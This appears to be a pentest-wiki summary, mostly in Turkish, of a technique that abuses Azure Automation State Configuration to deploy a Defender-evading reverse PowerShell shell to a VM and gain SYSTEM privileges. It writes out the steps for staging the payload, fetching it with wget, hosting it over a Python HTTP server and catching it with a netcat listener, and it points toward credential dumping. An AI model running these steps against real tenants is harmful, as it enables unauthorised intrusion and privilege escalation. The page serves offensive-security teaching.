Az - State Configuration RCE

Check the complete post in: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Summary of Remote Server (C2) Infrastructure Preparation and Steps

Overview

Bu süreç, Windows Defender'ı atlatmak için tasarlanmış, RevPS.ps1 adında değiştirilmiş bir Nishang Invoke-PowerShellTcp.ps1 yükünü barındırmak üzere bir uzak sunucu altyapısının kurulmasını içerir. Yük, IP'si 40.84.7.74 olan bir Kali Linux makinesinden basit bir Python HTTP sunucusu kullanılarak sunulmaktadır. İşlem birkaç adımda gerçekleştirilir:

Step 1 — Create Files

• Gerekli Dosyalar: İki PowerShell betiği gereklidir:

1. reverse_shell_config.ps1: Yükü alıp çalıştıran bir İstenilen Durum Yapılandırması (DSC) dosyasıdır. GitHub adresinden temin edilebilir.

2. push_reverse_shell_config.ps1: Yapılandırmayı VM'ye yayınlamak için bir betik, GitHub adresinde mevcuttur.

• Özelleştirme: Bu dosyalardaki değişkenler ve parametreler, kullanıcıya özgü ortam için, kaynak adları, dosya yolları ve sunucu/yük tanımlayıcıları dahil olmak üzere özelleştirilmelidir.

Step 2 — Zip Configuration File

• reverse_shell_config.ps1 bir .zip dosyasına sıkıştırılır, böylece Azure Storage Account'a transfer için hazır hale gelir.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Adım 3 — Depolama Bağlamını Ayarla ve Yükle

• Sıkıştırılmış yapılandırma dosyası, Azure'un Set-AzStorageBlobContent cmdlet'ini kullanarak önceden tanımlanmış Azure Depolama konteyneri olan azure-pentest'e yüklenir.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Adım 4 — Kali Kutusunu Hazırlama

• Kali sunucusu RevPS.ps1 yükünü bir GitHub deposundan indirir.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

• Script, hedef Windows VM ve ters shell için port belirtmek üzere düzenlenir.

Adım 5 — Konfigürasyon Dosyasını Yayınla

• Konfigürasyon dosyası çalıştırılır ve sonuç olarak ters shell scripti, Windows VM üzerindeki belirtilen konuma dağıtılır.

Adım 6 — Payload'ı Barındır ve Dinleyici Kur

• Payload'ı barındırmak için bir Python SimpleHTTPServer başlatılır ve gelen bağlantıları yakalamak için bir Netcat dinleyicisi kurulur.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443

• Planlı görev, yükü çalıştırarak SYSTEM düzeyinde ayrıcalıklar elde eder.

Sonuç

Bu sürecin başarılı bir şekilde yürütülmesi, kimlik bilgisi dökme veya saldırıyı birden fazla VM'ye genişletme gibi daha fazla eylem için sayısız olasılık açar. Kılavuz, Azure Automation DSC alanında sürekli öğrenmeyi ve yaratıcılığı teşvik eder.